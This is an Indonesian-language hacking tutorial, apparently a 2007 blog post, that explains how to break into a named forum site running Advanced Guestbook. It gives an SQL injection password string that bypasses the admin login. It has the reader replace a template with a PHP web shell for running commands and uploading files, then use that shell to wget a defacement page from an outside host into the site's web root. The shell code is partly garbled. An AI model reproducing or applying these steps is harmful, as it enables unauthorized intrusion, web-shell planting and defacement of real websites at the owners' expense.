February 1st, 2007
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1. http://www.smackfoundation.com/forum4/admin.php
2. Kemudian inject :
Username:
Password: ‘)or(’a'=’a
3. Setelah kamu masuk maka akan muncul :
Private Messages | Easy Admin | General Settings | Style | Templates | Smilies | Password | Logout
Pilih Templates trus pilih url.php Hapus lah script yg ada
disana. Kemudian copy pastekan script ini :
chdir($_POST['dir']); } ?>
Advanced Guestbook Injectionif ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="ls -la ; pwd ;id "; } echo ""; echo ""; echo ""; ?> |
if (($HTTP_POST_FILES["filenyo"]!=="") AND ($HTTP_POST_FILES["filenyo"]))
{
copy($HTTP_POST_FILES["filenyo"][tmp_name],
$_POST['dir']."/".$HTTP_POST_FILES["filenyo"][name])
or print("
}
?>
echo ""; ?> |
Kemudian klik tab "Submit Settings" yg dibawah.
4. Buka url/browsing baru trus ketik http://www.smackfoundation.com/forum4/templates/url.php
5. Di kolom cmd ketik :
cd /home/smack/public_html;wget http://k.domaindlx.com/jambihackerlinkcrew/jh.htm
Trus klik tab Submit, tunggu beberapa saat…….
6. Kalo udah, buka url/browsing baru lalu ketikkan situs
target tadi, misal nya : http://www.smackfoundation.com/jh.htm
Kalo nggak ada hasil nya coba klik tab Refresh yg ada diatas
disamping url/browsing.
Bookmark and Share
